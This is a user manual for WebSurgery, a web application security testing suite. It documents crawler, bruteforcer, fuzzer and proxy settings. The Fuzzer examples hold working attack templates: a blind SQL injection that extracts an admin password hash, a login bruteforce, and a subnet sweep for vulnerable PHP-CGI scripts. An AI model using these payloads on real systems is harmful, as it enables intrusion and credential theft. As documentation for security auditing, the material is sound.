------------------------
WebSurgery User Manual
Version 1.1
Sunrise Technologies Ltd
Copyright © 2013 All rights reserved
e: info@sunrisetech.gr
w: www.sunrisetech.gr
------------------------

=================
Table of Contents
=================
1 Overview
2 Tools
  2.1 Crawler
  2.2 Bruteforcer
  2.3 Fuzzer
  2.4 Editor
  2.5 Proxy
3 Extra Tools
  3.1 Filters
  3.2 List Generator
  3.3 External Proxy

========================================================================================================
1 Overview
========================================================================================================

WebSurgery is a suite of tools for security testing of web applications. It was designed for security
auditors to help them with web application planning and exploitation. The suite currently contains a
spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some
extra functionality tools (Scripting Filters, List Generator, External Proxy).

Tools
-----
Crawler
- High Performance Multi-Threading and Completely Parameterized Crawler
- Extracts Links from HTML / CSS / JavaScript / AJAX / XHR
- Hidden Structure Identification with Embedded Bruteforcer
- Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries)
- Parameterized Limit Rules (Case Sensitive, Process Above / Below, Dir Depth, Max Same File / Script Parameters / Form Action File)
- Parameterized Extra Rules (Fetch Indexes/Sitemaps, Submit Forms, Custom Headers)
- Supports Advanced Filters with Scripting & Regular Expressions (Process, Exclude, Page Not Found, Search Filters)

Bruteforcer
- High Performance Multi-Threading Bruteforcer for Hidden Structure (Files / Directories)
- Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries)
- Parameterized Rules (Base Dir, Bruteforce Dirs / Files, Recursive, File Extension, Custom Headers)
- Parameterized Advanced Rules (Send GET / HEAD, Follow Redirects, Process Cookies)
- Supports Advanced Filters with Scripting & Regular Expressions (Page Not Found, Search Filters)
- Supports List Generator with Advanced Rules

Fuzzer
- High Performance Multi-Threading Fuzzer Generates Requests based on Initial Request Template
- Exploitation for (Blind) SQL Injections, Cross Site Scripting (XSS), Denial of Service (DOS), Bruteforce for Username / Password Authentication Login Forms
- Identification of Improper Input Handling and Firewall / Filtering Rules
- Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries)
- Parameterized Advanced Rules (Follow Redirects, Process Cookies)
- Supports Advanced Filters with Scripting & Regular Expressions (Stop / Reset Level, Search Filters)
- Supports List Generator with Advanced Rules
- Supports Multiple Lists with Different Levels

Proxy
- Proxy Server to Analyze, Intercept and Manipulate Traffic
- Parameterized Listening Interface IP Address & Port Number
- Supports Advanced Filters with Scripting & Regular Expressions (Process, Intercept, Match-Replace, Search Filters)

Editor
- Advanced ASCII/HEX Editor to Manipulate Individual Requests
- Parameterized Timing Settings (Timeout, Max Data Size, Retries)
- Automatically Fix Request (Content-Length, New Lines at End)
Extra Tools
-----------
Scripting Filters
- Advanced Scripting Filters to Filter Specific Requests / Responses
- Main Variables (url, proto, hostport, host, port, pathquery, path, query, file, ext)
- Request Variables (size, hsize, dsize, data, hdata, ddata, method, hasparams, isform)
- Response Variables (size, hsize, dsize, data, hdata, ddata, status, hasform)
- Operators =, !=, ~, !~, >=, <=, >, <
- Conjunctions &, |
- Supports Reverse Filters and Parentheses

List Generator
- List Generator for Different List Types (File, Charset, Numbers, Dates, IP Addresses, Custom)
- Parameterized Rules (Prefix, Suffix, Case, Reverse, Fixed-Length, Match-Replace)
- Parameterized Crypto / Hash Rules (URL, URL All, HTML, BASE-64, ASCII, HEX, MD5, SHA-512)

External Proxy
- External Proxy Redirects Traffic to Another Proxy
- Supports Non-Authenticated Proxies (HTTP, SOCKS4, SOCKS5)
- Supports Authenticated Proxies (HTTP Basic, SOCKS5 Username / Password)
- Supports DNS Lookups at Proxy Side

========================================================================================================
2 Tools
========================================================================================================

===========
2.1 Crawler
===========

Crawler is designed to be fast, accurate, stable and completely parameterized, using advanced techniques
to extract links from HTML, CSS, JavaScript and AJAX.

Timing
  Timeout, Threading, Max Data Size, Retries

Rules (Limit)
  Case Sensitive, Process Above / Below, Dir Depth, Max Same File / Script Parameters / Form Action File

Rules (Extra)
  Fetch Indexes/Sitemaps, Submit Forms, Custom Headers

Rules (Filters)

  PageNotFound
    [Default Value]: status=404
    If you leave this blank, by default the Crawler will consider a response as PageNotFound if the
    returned HTTP status code is 404, and it will try to automatically identify other PageNotFound
    responses. You could use a custom PageNotFound Filter for the redirections from a file to a
    directory (eg: if /test redirects to /test/):-

    status=404 | (status=301 & hdata~location:\s*http://www\.example\.com[/]*${path}[/]*/[\n\s\r$]+)

  Process
    [Default Value]: hostport=${init.hostport} | hostport=www.${init.hostport}
    If you leave this blank, by default the Crawler will process the initial url (eg: http://example.com)
    and, if it redirects, it will also process https://example.com, http://www.example.com and
    https://www.example.com. However, if you want to focus only on the initial protocol://hostname:port
    url, you could specify the following Process Filter:-

    proto=${init.proto} & hostport=${init.hostport}

  Exclude
    [Default Value]:
    ext!~^(jpg|jpeg|ico|bmp|gif|png|tif|tiff|psd|dwg|cad|aiff|au|cdda|wav|wma|mp1|mp2|mp3|aac|ra|rm|mid|midi|pls|m3u|aaf|3gp|asf|avi|cam|flv|m1v|m2v|m4v|mkv|mov|mpeg|mpg|mpe|mp4|mp4v|wmv|doc|docx|pdf|rtf|lwp|mcw|tex|info|pps|ppt|123|aws|csv|odt|ods|ots|sdc|wks|xls|xlsx|xlt|7z|ace|arc|arj|bz|bz2|cab|daa|dmg|deb|gz|ipg|jar|pak|mpq|tar|zip|rar|iso|img|cue|adf|nrg|dmg|accdb|db|dbf|mdb|ldb|myd|myi|mdf|odb|ora|sql|pdb|udl|wdb|adp|exe|com|bat|msi|bak|sh|cpp|c|swf|eot|svg|ttf|woff)$
    If you leave this blank, by default the Crawler will exclude all the image, video, document, etc
    file extensions (eg: logo.png).

  Search
    Search filters to filter output results at the end of the scan (See "3.1 Filters" for more details).
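    As an illustration (this is not a built-in default), a Search filter such as the following would
    keep only successful responses whose body appears to contain a login form:-

    status=200 & data~(login|password)

    See "3.1 Filters" for the full list of variables and operators.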
===============
2.2 Bruteforcer
===============

Bruteforcer for files and directories within the web application, which helps to identify the hidden
structure.

Timing
  Timeout, Threading, Max Data Size, Retries

Rules (Basic)
  Base Dir, Bruteforce Dirs / Files, Recursive, File Extension, Custom Headers

Rules (Advanced)
  Send GET/HEAD, Follow Redirects, Process Cookies

Rules (List Type)
  (See "3.2 List Generator" for more details)

Filters

  PageNotFound
    [Default Value]: status=404
    If you leave this blank, by default the Bruteforcer will consider a response as PageNotFound if the
    returned HTTP status code is 404, and it will try to automatically identify other PageNotFound
    responses. You could use a custom PageNotFound Filter for the redirections from a file to a
    directory (eg: if /test redirects to /test/):-

    status=404 | (status~301 & hdata~location:\s*http://www\.example\.com[/]*${path}[/]*/[\n\s\r$]+)

  Search
    Search filters to filter output results at the end of the scan (See "3.1 Filters" for more details).

==========
2.3 Fuzzer
==========

Fuzzer is a highly advanced tool to create a number of requests based on one initial request. Fuzzer has
no limits and can be used to exploit (Blind) SQL Injections, Cross Site Scripting (XSS), Denial of
Service (DOS), Bruteforce for Username / Password Authentication Login Forms, and identification of
Improper Input Handling and Firewall / Filtering Rules.

Timing
  Timeout, Threading, Max Data Size, Retries

Rules
  Follow Redirects, Process Cookies

Lists
  List Type  (See "3.2 List Generator" for more details)
  ListID     Unique list id
  LevelID    Specifies in which level the list will run

Filters
  Stop/Reset Level at first match
    To prevent sending pointless requests, you can reset a specific list or even stop the whole scan
    when the response matches the applied filters.
  Search
    Search filters to filter output results at the end of the scan (See "3.1 Filters" for more details).

Example 1) Basic Configuration Setup

Set Target
  http://www.example.com

Set Request (Initial)
  GET /news.asp?id=1 HTTP/1.1
  HOST: www.example.com

Set List
  (ListID=1, LevelID=1) Numbers from 1 to 20 with Step 1

Set Request (Final)
  GET /news.asp?id=${List_1} HTTP/1.1
  HOST: www.example.com

The above example will send 20 requests:-

GET /news.asp?id=1 HTTP/1.1
HOST: www.example.com

GET /news.asp?id=2 HTTP/1.1
HOST: www.example.com

...

GET /news.asp?id=20 HTTP/1.1
HOST: www.example.com

Example 2) Authentication - Bruteforce attack

Let's assume that we have a GET authentication form and we want to bruteforce it with usernames
(admin, root) and passwords (111, 222) from our files.

Set Request (Initial)
  GET /login.php?username=&password= HTTP/1.0

Set Lists
  (ListID=1, LevelID=1) File List ('usernames.txt')
  (ListID=2, LevelID=2) File List ('passwords.txt')

Set Request (Final)
  GET /login.php?username=${List_1}&password=${List_2} HTTP/1.1

The above example will send 4 requests:-

admin 111
admin 222
(Level 2 resetting)
root 111
root 222

We could also configure filters (for example, if you do not get 'login failed' within the response data,
it means that you got a valid user/pass pair) and Reset at Level 2 to reset the second list with the
passwords, to avoid sending pointless requests. The stop/reset level options matter mainly when you use
large lists; if you use a very small list with a lot of threads, it is very possible that the fuzzer
will already have sent the requests.
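For the scenario in Example 2, a Reset Level filter could look like the following (an illustrative
value; the exact failure message depends on the target application):-

data!~login\s+failed

With the Reset Level set to 2, as soon as a response does not contain 'login failed' (i.e. a valid
user/pass pair was found), the password list is reset and the Fuzzer moves on to the next username.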
Example 3) Firewall / Filtering Rules Identification

Set Request (Initial)
  GET /news.asp?id=1 HTTP/1.0

Set List
  (ListID=1, LevelID=1) Charset '0123456789ABCDEF' with Min length 2 and Max length 2

Set Request (Final)
  GET /news.asp?id=1%${List_1} HTTP/1.0

The above example will send 256 requests:-

%00
%01
...
%FF

By reviewing the response HTTP status code and response size we could identify the firewall/filtering
rules. This example focuses on HEX codes and just one character; we could use more attacks to identify
the filters in use, for example different encodings, words and sentences ("union all", "/etc/passwd",
"cmd.exe", etc).

Example 4) Exploiting Blind SQL Injection

Let's say that the vuln.php script is vulnerable to blind SQL injection attacks and we want to extract
the admin MD5 hash from the MySQL back-end database. We will need two lists: one to say which character
of the admin's password hash we want to extract (MD5 length) and a second list with the valid MD5
characters (HEX) to test if they are equal.

Set Request (Initial)
  GET /vuln.php?id= HTTP/1.0

Set Lists
  (ListID=1, LevelID=1) Numbers from 1 to 32 Step 1
  (ListID=2, LevelID=2) Charset '0123456789ABCDEF' with Min length 1 and Max length 1

Set Request (Final)
  GET /vuln.php?id=1+and+'${List_2}'=substring((select+password+from+admin+limit+1),${List_1},1) HTTP/1.0

The above example will send 32*16=512 requests:-

1 0
1 1
1 2
1 3
...
1 F
(Level 2 resetting)
2 0
2 1
...
32 E
32 F

Example 5) Searching a class C network for a known vulnerable file

Let's say that we want to test the web servers within our class C network for the latest PHP-CGI
vulnerability. We will need two lists: one to specify the IP Addresses (Class C) of our network and a
second one to specify the possible vulnerable PHP-CGI scripts.

Set Target (Initial)
  http://1.2.3.4

Set Request (Initial)
  GET /cgi-bin/ HTTP/1.1
  HOST: 1.2.3.4

Set Lists
  (ListID=1, LevelID=1) Custom [php,php4,php5,php-cgi,php.cgi]
  (ListID=2, LevelID=2) IP Addresses from 1.2.3.0 to 1.2.3.255 Step 0.0.0.1 (Class C 1.2.3.0/24)

Set Target (Final)
  http://${List_2}

Set Request (Final)
  GET /cgi-bin/${List_1} HTTP/1.1
  HOST: ${List_2}

The above example will send 256*5=1280 GET requests:

http://1.2.3.0/cgi-bin/php
http://1.2.3.1/cgi-bin/php
...
http://1.2.3.255/cgi-bin/php
(Level 2 resetting)
http://1.2.3.0/cgi-bin/php4
http://1.2.3.1/cgi-bin/php4
...
http://1.2.3.255/cgi-bin/php.cgi

NOTES
* To apply a list within the initial request, you can just drag and drop the list at the point where you
  want to add it, or manually type ${List_<ListID>} within the initial request (eg: ${List_1})
* You can apply a list within the target url, eg: http://${List_1}:8080 (if you use HTTP/1.1 you will
  also need to apply this list in the HOST header)
* You can apply a list within the initial request more than once (eg: GET /news.asp?id1=${List_1}&id2=${List_1} HTTP/1.1)
* All the lists that run at the same level must have the same total number of requests
* Preview All Lists helps you to ensure that you generated the right lists before you send the requests
* Stop/Reset Level works better when not too many threads are used and the stop/reset level lists are not too small
* You can use the HEX Editor for more advanced requests

==========
2.4 Editor
==========

A simple Editor to send individual requests. It also contains a HEX Editor for more advanced requests.
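For instance, a minimal request that you might compose and send from the Editor could look like the
following (www.example.com is used purely as an illustration):-

GET /index.php HTTP/1.1
HOST: www.example.com
Connection: close

As listed in "1 Overview", the Editor can automatically fix the Content-Length header and the new lines
at the end of the request before it is sent.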
=========
2.5 Proxy
=========

Proxy is a server running locally that will allow you to analyze, intercept and manipulate HTTP/HTTPS
requests coming from your browser or any other application which supports proxies.

Listener
  Specify which IP address and port to listen on (eg: 127.0.0.1:8080)

Filters
  Process
    Specify which requests the proxy needs to process, for example a specific host (eg: host=www.example.com)
  Intercept
    Specify which requests you want to intercept
  Search
    Search filters to filter output results (See "3.1 Filters" for more details)

Install/Uninstall CA Certificate
  To avoid SSL warning messages once and for all, you will need to install the CA Certificate as Trusted
  and then import the 'WebSurgery.cer' CA Certificate file (from the installation folder) into your
  browser's 'Authorities' certificates. In case you uninstall the CA Certificate and re-install it, you
  should also update your browser/application with the new CA Certificate file 'WebSurgery.cer'.
  (eg: for Firefox: Tools->Options->Advanced->Encryption->View Certificates->Authorities->Import)

Match/Replace Rules
  Process filter
    Specify which requests the match/replace rules need to process
  Look In
    Specify where to look, in the -request or response- data
  Match (regex)
    Specify which part of the 'Look In' variable needs to be replaced, using a .NET regular expression
  Quick Replace
    Replace the above matched part with the replace string
  List Rules
    Gets the matched part and applies the rules list (See "3.2 List Generator" for more details)

Quick Replace actually creates one 'list match/replace rule' with match "^.*$" (whole string) and uses
the 'Quick Replace' string as the replacement. Additionally, for the 'Match (regex)' you can have an
'inside' string. For example, if you want to replace the word 'scanner' with 'test', you just need the
following settings:-

Match (regex): scanner
Quick Replace: test

However, if you want to replace the word 'scanner' with 'test' but only when the previous word is one of
'web', 'dns', 'vulnerability', then you can specify a .NET regex group with the name 'inside':-

Match (regex): (web|dns|vulnerability) (?<inside>scanner)
Quick Replace: test
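For the Process and Intercept filters above, an illustrative setup (not a default value) would be a
Process filter of host=www.example.com combined with the following Intercept filter, which intercepts
only POST requests sent to that host:-

host=www.example.com & method=post

See "3.1 Filters" for the full filter syntax.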
========================================================================================================
3 Extra Tools
========================================================================================================

===========
3.1 Filters
===========

Filters can be used to filter the Crawler's, Bruteforcer's and Fuzzer's search results. You can also use
filters to specify a custom 'Page Not Found', 'Process' or 'Exclude' filter for the Crawler and
Bruteforcer.

The following syntax is valid:

  <statement> <conjunction> <statement> ...   (parentheses are also available)

where:
  <statement>:   <variable><operator><value>
  <conjunction>: & for AND, | for OR

[Main variables]
url        // https://www.example.com:232/dir1/file.asp?param=1
proto      // https
hostport   // www.example.com:232
host       // www.example.com
port       // 232
pathquery  // /dir1/file.asp?param=1
path       // /dir1/file.asp
query      // ?param=1
file       // file.asp
ext        // asp

[Request variables]
rq.size      // request size
rq.hsize     // request headers size
rq.dsize     // request data size
rq.data      // request data
rq.hdata     // request headers data
rq.ddata     // request body data
rq.method    // request method (eg: GET)
rq.hasparams // if it has GET/POST parameters
rq.isform    // request that came from a response that had a <form> inside (works only for crawler's filters)

[Response variables] (rp. is optional)
rp.size    // response size
rp.hsize   // response headers size
rp.dsize   // response data size
rp.data    // response data
rp.hdata   // response headers data
rp.ddata   // response body data
rp.status  // http response headers status (eg: 404)
rp.hasform // response body data includes <form> tags
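As an illustrative combination of the variables above (not one of the tool's defaults), the following
filter keeps successful POST requests whose response body contains the word 'error':-

rq.method=post & rp.status=200 & rp.ddata~error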
Additionally, you can use Main variables within values, for the current or the initial request. The
following syntax is valid for Main variable values:-

${Main_variable_name}       for the current request (See "2.1 Crawler" Filters)
${init.Main_variable_name}  for the initial request (See "2.1 Crawler" Filters)

[Operators]
=  // equal (ignores spaces at begin/end)
!= // not equal
~  // regular expression .NET match
!~ // regular expression .NET not match
>= // greater or equal
<= // less or equal
>  // greater
<  // less

[Additional features]
!(statement) // reverses the meaning of the statement (true->false)

[Examples]
1. url~\.php$      // show all requests whose url ends with .php
2. data~password   // show all requests that have the word 'password' within the whole response data
3. hasparams=true  // show requests that accept inputs - form (get/post) or query string
4. method=post     // show form POST requests
5. (url~\.php$ & size>100) | status~3[0-9][0-9]
                   // show requests where (the url ends with .php AND the packet size is greater than
                      100 bytes) OR the http status code matches 3xx

==================
3.2 List Generator
==================

List Generator produces the list(s) for the Bruteforcer and Fuzzer.

[Lists]
File     // Reads lines from a specific file and creates the list
Charset  // All combinations from Min to Max Length from a specific charset
Numbers  // A list of numbers from X to Y (with Step Z and Format)
Dates    // A list of dates from X to Y (with Step Z days/months and Format)
IPs      // A list of IP Addresses from X to Y (with Step Z)
Custom   // A quick custom list

Additional rule(s) can be applied to create more advanced lists.

[List Rules]
Prefix        // Adds a prefix
Suffix        // Adds a suffix
Case          // Changes the case to Upper or Lower
Reverse       // Reverses every list record
Fixed Length  // Changes the length to a fixed size, with a specific char at the end or beginning
Match Replace // Replaces every list record that matches the applied regular expression
Hash          // Creates the hash of every list record (MD5, SHA-512 currently available)
Encode        // Encodes every list record (URL, URL All, HTML, Base64, Ascii, Hex currently available)
Decode        // Decodes every list record (URL, HTML, Base64 currently available)

==================
3.3 External Proxy
==================

You can configure WebSurgery to send all the generated traffic through a proxy. Currently, it supports
HTTP proxies without authentication or with basic authentication, SOCKS4 proxies without authentication,
SOCKS5 proxies without authentication or with username/password authentication, and DNS Lookups at the
proxy's side.

You could also configure the Proxy tool to listen locally and then configure it as the external proxy as
well, so you can review exactly which packets were sent from the WebSurgery Suite.